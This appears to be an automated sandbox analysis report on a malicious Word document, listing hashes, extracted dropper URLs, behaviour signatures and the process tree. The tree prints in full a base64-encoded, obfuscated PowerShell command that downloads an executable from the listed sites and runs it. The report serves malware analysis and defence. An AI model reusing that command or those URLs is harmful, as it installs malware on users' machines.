Analysis

  • max time kernel
    161s
  • max time network
    165s
  • platform
    windows7_x64
  • resource
    win7-20221111-en
  • resource tags

    arch:x64arch:x86image:win7-20221111-enlocale:en-usos:windows7-x64system
  • submitted
    25-11-2022 09:10

General

  • Target

    601804d1434691765b258649f0a9c8924bb1b28b5ff0dc2bafb3039b2c78f6a3.doc

  • Size

    187KB

  • MD5

    fd0c0ac454f459acc1cd124fd097740a

  • SHA1

    741cb7d37dbb4ca805174a194dbf9eb4f51ad727

  • SHA256

    601804d1434691765b258649f0a9c8924bb1b28b5ff0dc2bafb3039b2c78f6a3

  • SHA512

    3322095ab7ac72b5de7a531ef85637892fe1f7cf62c65f1179d7abb7d38070c06e0e14236e6db0093ba4662f84d936e232a17ebe4bb2d11ba57b84ca0d3983c2

  • SSDEEP

    3072:w77HUUUUUUUUUUUUUUUUUUUTkOQePu5U8qgKFCS0JKoVqP4dLQitFzhgDhCR:w77HUUUUUUUUUUUUUUUUUUUT52VNS0J5

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://ingenla.com/wp-content/XA_fj/

exe.dropper

http://ises.com.pl/wp-admin/n2_df/

exe.dropper

http://hicast.tn/wp-includes/8_X/

exe.dropper

https://jcci-card.vn/wp-includes/O_R8/

exe.dropper

http://appcost.win/noerk24jt/m_c/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 8 IoCs
  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\601804d1434691765b258649f0a9c8924bb1b28b5ff0dc2bafb3039b2c78f6a3.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1292
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:1360
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -e JABPAFoAVQBrAEEAXwBvAGsAPQAoACIAewAyAH0AewAxAH0AewAwAH0AIgAtAGYAJwBrACcALAAnAEcAQQBCACcALAAnAGYAMQAnACkAOwAkAG4AQwBDAEEARABVACAAPQAgACcANAAyADMAJwA7ACQAawAxAG8AVQBvAG8AQQA9ACgAIgB7ADEAfQB7ADIAfQB7ADAAfQAiAC0AZgAnAFoAMQBrACcALAAoACIAewAwAH0AewAxAH0AIgAgAC0AZgAgACcAdwBRACcALAAnAF8AQQAnACkALAAnAEEAJwApADsAJABOAFgAQQBBAEEAQQBRAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABuAEMAQwBBAEQAVQArACgAIgB7ADAAfQB7ADEAfQAiAC0AZgAgACcALgBlAHgAJwAsACcAZQAnACkAOwAkAFoAQQAxAGsAdwBBAEEAPQAoACIAewAxAH0AewAyAH0AewAwAH0AIgAgAC0AZgAgACcAUQB3ACcALAAoACIAewAwAH0AewAxAH0AIgAgAC0AZgAnAGkAJwAsACcAawBBADEAJwApACwAJwBBACcAKQA7ACQAbQAxAEEAeABRAEEAQQA9ACYAKAAnAG4AJwArACcAZQAnACsAJwB3AC0AbwBiAGoAZQAnACsAJwBjAHQAJwApACAATgBgAEUAdAAuAGAAVwBFAEIAYABjAGwAaQBFAE4AdAA7ACQAcABCAEIAawBrAFUAbwBRAD0AKAAiAHsANAA1AH0AewAyADQAfQB7ADIANQB9AHsAMwA4AH0AewAxADcAfQB7ADIAMwB9AHsAMwAxAH0AewAxADMAfQB7ADMANwB9AHsAMQAxAH0AewAzAH0AewA0ADQAfQB7ADEAOAB9AHsANAA5AH0AewAxADAAfQB7ADEAOQB9AHsANAAyAH0AewA0ADcAfQB7ADQAMAB9AHsANwB9AHsAMQA1AH0AewAyADAAfQB7ADMAMwB9AHsAMgA2AH0AewAyADEAfQB7ADQANgB9AHsAMQA0AH0AewA0AH0AewAzADYAfQB7ADIANwB9AHsAOQB9AHsAMwAyAH0AewA0ADMAfQB7ADEAfQB7ADMAOQB9AHsANAAxAH0AewA2AH0AewAxADYAfQB7ADEAMgB9AHsANAA4AH0AewA1ADAAfQB7ADgAfQB7ADIAOAB9AHsAMwAwAH0AewAwAH0AewA1AH0AewAyADIAfQB7ADIAOQB9AHsAMwA1AH0AewAyAH0AewAzADQAfQAiAC0AZgAgACgAIgB7ADIAfQB7ADEAfQB7ADAAfQAiAC0AZgAnAGkAbgAnACwAKAAiAHsAMQB9AHsAMAB9ACIAIAAtAGYAJwAuAHcAJwAsACcAcwB0ACcAKQAsACcAYwBvACcAKQAsACcAcAAtACcALAAnAG0AJwAsACgAIgB7ADEAfQB7ADAAfQAiACAALQBmACAAJwAvACcALAAnAC4AcABsACcAKQAsACcAdAAnACwAJwAvACcALAAnAHUAZABlACcALAAnAC8AJwAsACcALwAnACwAJwBjAGEAcgAnACwAKAAiAHsAMAB9AHsAMQB9ACIAIAAtAGYAJwBkAG0AaQAnACwAJwBuAC8AbgAnACkALAAoACIAewAwAH0AewAxAH0AIgAgAC0AZgAgACcALgBjAG8AJwAsACcAbQAnACkALAAoACIAewAxAH0AewAwAH0AIgAtAGYAIAAnAF8AUgA4ACcALAAnAC8ATwAnACkALAAnAC8AWAAnACwAJwAvAEAAaAAnACwAKAAiAHsAMgB9AHsAMQB9AHsAMAB9ACIALQBmACAAJwAvACcALAAnAHQAbgAnACwAKAAiAHsAMgB9AHsAMQB9AHsAMAB9ACIALQBmACAAJwAuACcALAAnAHQAJwAsACcAaABpAGMAYQBzACcAKQApACwAJwBzACcALAAoACIAewAxAH0AewAyAH0AewAwAH0AIgAgAC0AZgAgACcAbwBtAC8AJwAsACcAYQAnACwAJwAuAGMAJwApACwAJwAtACcALAAoACIAewAwAH0AewAxAH0AIgAtAGYAJwAyACcALAAoACIAewAwAH0AewAxAH0AIgAtAGYAJwBfAGQAZgAnACwAJwAvACcAKQApACwAJwB3ACcALAAnAHMAJwAsACcAbgBvAGUAJwAsACgAIgB7ADEAfQB7ADIAfQB7ADAAfQAiACAALQBmACcAbgAnACwAJwB3AHAALQAnACwAKAAiAHsAMQB9AHsAMAB9ACIALQBmACAAJwBlACcALAAnAGMAbwBuAHQAJwApACkALAAnAGkAbgBnACcALAAnAGUAbgAnACwAKAAiAHsAMAB9AHsAMQB9ACIAIAAtAGYAJwBpAG4AYwAnACwAKAAiAHsAMAB9AHsAMQB9ACIALQBmACcAbAB1ACcALAAnAGQAZQAnACkAKQAsACgAIgB7ADAAfQB7ADEAfQAiACAALQBmACAAJwBjAGMAJwAsACcAaQAtACcAKQAsACcALwBhAHAAJwAsACcAcgBrACcALAAnAHAAJwAsACcAdAAnACwAJwBkAC4AJwAsACcAcAAtACcALAAnAF8AYwAvACcALAAoACIAewAxAH0AewAwAH0AIgAtAGYAIAAoACIAewAxAH0AewAwAH0AIgAtAGYAIAAnAC8AJwAsACcANABqAHQAJwApACwAJwAyACcAKQAsACgAIgB7ADAAfQB7ADEAfQB7ADIAfQAiACAALQBmACgAIgB7ADAAfQB7ADEAfQAiAC0AZgAnAHQAcABzACcALAAnADoAJwApACwAJwAvACcALAAnAC8AagAnACkALAAoACIAewAzAH0AewAwAH0AewAxAH0AewA0AH0AewAyAH0AIgAtAGYAKAAiAHsAMAB9AHsAMQB9ACIAIAAtAGYAJwBmAGoAJwAsACcALwBAACcAKQAsACcAaAB0AHQAJwAsACgAIgB7ADAAfQB7ADEAfQB7ADIAfQAiACAALQBmACAAJwA6ACcALAAnAC8ALwBpACcALAAnAHMAZQBzACcAKQAsACcAQQBfACcALAAnAHAAJwApACwAJwBsACcALAAnAGkAbgBjACcALAAnAC8AJwAsACcAbAAnACwAJwBAAGgAJwAsACgAIgB7ADEAfQB7ADAAfQAiAC0AZgAgACcAdwAnACwAJwB2AG4ALwAnACkALAAnAHcAcAAnACwAKAAiAHsAMAB9AHsAMQB9ACIALQBmACAAKAAiAHsAMgB9AHsAMQB9AHsAMAB9ACIALQBmACAAJwAvACcALAAnAHAAOgAnACwAJwBoAHQAdAAnACkALAAnAC8AJwApACwAKAAiAHsAMQB9AHsAMAB9ACIALQBmACAAJwBfAFgAJwAsACcALwA4ACcAKQAsACgAIgB7ADAAfQB7ADEAfQAiAC0AZgAnAHQAdAAnACwAJwBwADoAJwApACwAKAAiAHsAMQB9AHsAMAB9ACIALQBmACAAJwBAAGgAdAAnACwAJwAvACcAKQAsACcAYQAnACwAJwB0AHAAOgAnACkALgAiAFMAcABgAEwASQB0ACIAKAAnAEAAJwApADsAJABvAFEAdwBrAGMARABBAD0AKAAiAHsAMAB9AHsAMgB9AHsAMQB9ACIAIAAtAGYAJwBQAG8AWAAnACwAKAAiAHsAMAB9AHsAMQB9ACIALQBmACcAVQBVAEMAJwAsACcAQwAnACkALAAnAG8AJwApADsAZgBvAHIAZQBhAGMAaAAoACQAdwBaAEIAVQBBAEEANAA0ACAAaQBuACAAJABwAEIAQgBrAGsAVQBvAFEAKQB7AHQAcgB5AHsAJABtADEAQQB4AFEAQQBBAC4AIgBkAE8AdwBOAGwATwBBAGAARABmAGAAaQBgAEwAZQAiACgAJAB3AFoAQgBVAEEAQQA0ADQALAAgACQATgBYAEEAQQBBAEEAUQApADsAJABJAEEAXwBDAEEAWABvAD0AKAAiAHsAMQB9AHsAMAB9ACIAIAAtAGYAIAAoACIAewAwAH0AewAxAH0AIgAgAC0AZgAnAFEAdwAnACwAJwBjAG8AJwApACwAJwBaAEIAJwApADsASQBmACAAKAAoAC4AKAAnAEcAZQB0ACcAKwAnAC0ASQAnACsAJwB0AGUAbQAnACkAIAAkAE4AWABBAEEAQQBBAFEAKQAuACIATABgAGUAbgBHAHQASAAiACAALQBnAGUAIAAyADYAOAA2ADAAKQAgAHsAJgAoACcASQBuACcAKwAnAHYAbwBrAGUAJwArACcALQBJAHQAZQBtACcAKQAgACQATgBYAEEAQQBBAEEAUQA7ACQAVQBBAFgAYwB4AEIAPQAoACIAewAwAH0AewAxAH0AewAyAH0AIgAgAC0AZgAgACcAUAAnACwAJwBBAEEAVQAnACwAKAAiAHsAMQB9AHsAMAB9ACIALQBmACAAJwBBACcALAAnAEQARwBDACcAKQApADsAYgByAGUAYQBrADsAJABSADQARABDAGsAXwBjAEEAPQAoACIAewAyAH0AewAwAH0AewAxAH0AIgAgAC0AZgAoACIAewAwAH0AewAxAH0AIgAtAGYAIAAnAFgAYwBEACcALAAnAHcAJwApACwAJwBVAEIARAAnACwAJwBpACcAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAagBBADEAMQBvAEEAPQAoACIAewAxAH0AewAyAH0AewAwAH0AIgAtAGYAJwA0ACcALAAnAEcAJwAsACgAIgB7ADAAfQB7ADEAfQAiACAALQBmACcAWAAnACwAKAAiAHsAMAB9AHsAMQB9ACIAIAAtAGYAIAAnADQAVQAnACwAJwA0AGsAeAAnACkAKQApAA==
      1⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:364

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/364-64-0x000007FEF4150000-0x000007FEF4B73000-memory.dmp
      Filesize

      10.1MB

    • memory/364-71-0x000000000286B000-0x000000000288A000-memory.dmp
      Filesize

      124KB

    • memory/364-70-0x0000000002864000-0x0000000002867000-memory.dmp
      Filesize

      12KB

    • memory/364-69-0x0000000002864000-0x0000000002867000-memory.dmp
      Filesize

      12KB

    • memory/364-68-0x000000000286B000-0x000000000288A000-memory.dmp
      Filesize

      124KB

    • memory/364-67-0x000000001B780000-0x000000001BA7F000-memory.dmp
      Filesize

      3.0MB

    • memory/364-65-0x000007FEF3530000-0x000007FEF408D000-memory.dmp
      Filesize

      11.4MB

    • memory/364-66-0x0000000002864000-0x0000000002867000-memory.dmp
      Filesize

      12KB

    • memory/1292-62-0x0000000005FCE000-0x0000000005FD4000-memory.dmp
      Filesize

      24KB

    • memory/1292-54-0x0000000072A41000-0x0000000072A44000-memory.dmp
      Filesize

      12KB

    • memory/1292-61-0x0000000005FCE000-0x0000000005FD4000-memory.dmp
      Filesize

      24KB

    • memory/1292-59-0x00000000714AD000-0x00000000714B8000-memory.dmp
      Filesize

      44KB

    • memory/1292-57-0x0000000075531000-0x0000000075533000-memory.dmp
      Filesize

      8KB

    • memory/1292-56-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

    • memory/1292-55-0x00000000704C1000-0x00000000704C3000-memory.dmp
      Filesize

      8KB

    • memory/1292-72-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

    • memory/1292-73-0x00000000714AD000-0x00000000714B8000-memory.dmp
      Filesize

      44KB

    • memory/1360-60-0x000007FEFBF31000-0x000007FEFBF33000-memory.dmp
      Filesize

      8KB

    • memory/1360-58-0x0000000000000000-mapping.dmp